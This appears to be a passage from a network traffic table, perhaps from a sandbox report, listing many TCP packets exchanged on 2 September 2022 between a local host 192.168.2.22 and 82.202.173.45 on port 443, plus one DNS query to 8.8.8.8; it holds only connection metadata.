Sep 2, 2022 13:24:22.701705933 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.703433990 CEST49174443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.703454018 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.870610952 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.870650053 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.870712042 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.872196913 CEST49174443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.872539043 CEST49174443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.004606962 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.004674911 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.004776001 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.005217075 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.005239964 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.127108097 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.127208948 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.133275986 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.133318901 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.134169102 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.135266066 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.175379038 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.289026022 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.289143085 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.289319038 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.289421082 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.289455891 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.289505005 CEST49175443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.289520979 CEST4434917582.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.289912939 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.289964914 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.290060043 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.290260077 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.290277004 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.410973072 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.411715031 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.411742926 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.413580894 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.413614988 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.598203897 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.598242044 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.598305941 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.598320961 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.598351955 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.598398924 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.601039886 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.601064920 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.601077080 CEST49176443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.601084948 CEST4434917682.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.617666960 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.617749929 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.617851019 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.618004084 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.618022919 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.744013071 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.744776011 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.744827032 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.746637106 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.746658087 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.914016962 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.914156914 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.914272070 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.914381027 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.914413929 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.914443016 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.914453983 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.914465904 CEST49177443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.914478064 CEST4434917782.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.915098906 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.915163040 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:23.915273905 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.915394068 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:23.915411949 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.042021036 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.042623043 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.042649031 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.044333935 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.044347048 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.232089043 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.232157946 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.232265949 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.232327938 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.232357979 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.237682104 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.237713099 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.237730026 CEST49178443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.237741947 CEST4434917882.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.251384020 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.251449108 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.251538038 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.251704931 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.251723051 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.377898932 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.378470898 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.378509998 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.379750967 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.379770994 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.548592091 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.548713923 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.548829079 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.555773973 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.555828094 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.555865049 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.555881023 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.555891991 CEST49179443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.555900097 CEST4434917982.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.556355000 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.556399107 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.556505919 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.556612968 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.556627989 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.678282976 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.678761005 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.678791046 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.679898024 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.679910898 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.873868942 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.873935938 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.874044895 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.876353025 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.877455950 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.877486944 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.877516031 CEST49180443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.877525091 CEST4434918082.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.918842077 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.918929100 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:24.919025898 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.919188023 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:24.919203997 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.034212112 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.034322023 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.045315981 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.045335054 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.048325062 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.048340082 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.257338047 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.257394075 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.257442951 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.257565022 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.257596016 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.257616043 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.257736921 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.261219978 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.263252974 CEST49181443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.263277054 CEST4434918182.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.628216982 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.628283024 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.628413916 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.628915071 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.628938913 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.749334097 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.749469995 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.774008036 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.774034023 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.776751995 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.776767015 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.924491882 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.924540043 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.924626112 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.924657106 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.924977064 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.925005913 CEST4434918282.202.173.45192.168.2.22
Sep 2, 2022 13:24:25.925020933 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:25.925064087 CEST49182443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.171884060 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.171927929 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.172344923 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.172534943 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.172544003 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.297657967 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.297729969 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.317229986 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.317254066 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.320019007 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.320030928 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.469254971 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.469381094 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.469582081 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.469819069 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.469840050 CEST4434918382.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.469880104 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.470036983 CEST49183443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.556929111 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.556968927 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.557070017 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.557473898 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.557492018 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.685995102 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.686091900 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.699223995 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.699244976 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.700035095 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.706851959 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.747369051 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.853168011 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.853286028 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.853384018 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.861366034 CEST49184443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.861394882 CEST4434918482.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.884521961 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.884589911 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:26.884685040 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.884943962 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:26.885004044 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.005764008 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.006418943 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.006444931 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.008321047 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.008338928 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.172365904 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.172487020 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.172638893 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.177921057 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.177954912 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.178010941 CEST49185443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.178025961 CEST4434918582.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.178498983 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.178534031 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.178628922 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.179280043 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.179295063 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.300115108 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.300517082 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.300534010 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.301480055 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.301491022 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.469640970 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.469671965 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.469738007 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.469825029 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.469871044 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.470244884 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.470280886 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.470336914 CEST49186443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.470350027 CEST4434918682.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.493421078 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.493474007 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.493571997 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.494168043 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.494187117 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.610224009 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.611579895 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.611609936 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.612926006 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.612948895 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.771157980 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.771261930 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.771387100 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.771579027 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.771601915 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.771718979 CEST49187443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.771732092 CEST4434918782.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.772330999 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.772392988 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.772548914 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.773075104 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.773113012 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.893675089 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.894490004 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.894524097 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:27.896410942 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:27.896430969 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.063087940 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.063153028 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.063239098 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.063260078 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.063323975 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.070012093 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.070060015 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.070079088 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.070091963 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.070102930 CEST49188443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.070112944 CEST4434918882.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.082968950 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.083033085 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.083123922 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.083307028 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.083327055 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.204646111 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.205641985 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.215804100 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.215838909 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.218364000 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.218400002 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.435931921 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.436047077 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.436167002 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.436270952 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.436301947 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.436321020 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.436332941 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.436424971 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.436430931 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.436595917 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.440187931 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.441576958 CEST49189443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.441603899 CEST4434918982.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.827261925 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.827295065 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.827404022 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.827625990 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.827641010 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.943757057 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.943856001 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.952480078 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.952502966 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:28.959297895 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:28.959317923 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.114829063 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.114999056 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.115210056 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.115246058 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.115403891 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.115432024 CEST4434919082.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.115508080 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.115557909 CEST49190443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.133202076 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.133276939 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.133439064 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.133662939 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.133683920 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.254767895 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.254934072 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.260881901 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.260899067 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.272063017 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.272089005 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487236977 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487308979 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487370968 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.487384081 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487390995 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.487437963 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.487452984 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487530947 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.487570047 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487643003 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.487653971 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487694025 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.487700939 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487759113 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.489001036 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.549762964 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.549812078 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.106692076 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.106761932 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.106980085 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.107181072 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.107209921 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.235860109 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.236004114 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.242399931 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.242423058 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.245078087 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.245094061 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.477787971 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.477845907 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.477931976 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.478002071 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.478028059 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.478044033 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.478063107 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.478176117 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.480907917 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.501635075 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.501671076 CEST4434919282.202.173.45192.168.2.22

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Sep 2, 2022 13:24:11.853436947 CEST5586853192.168.2.228.8.8.8
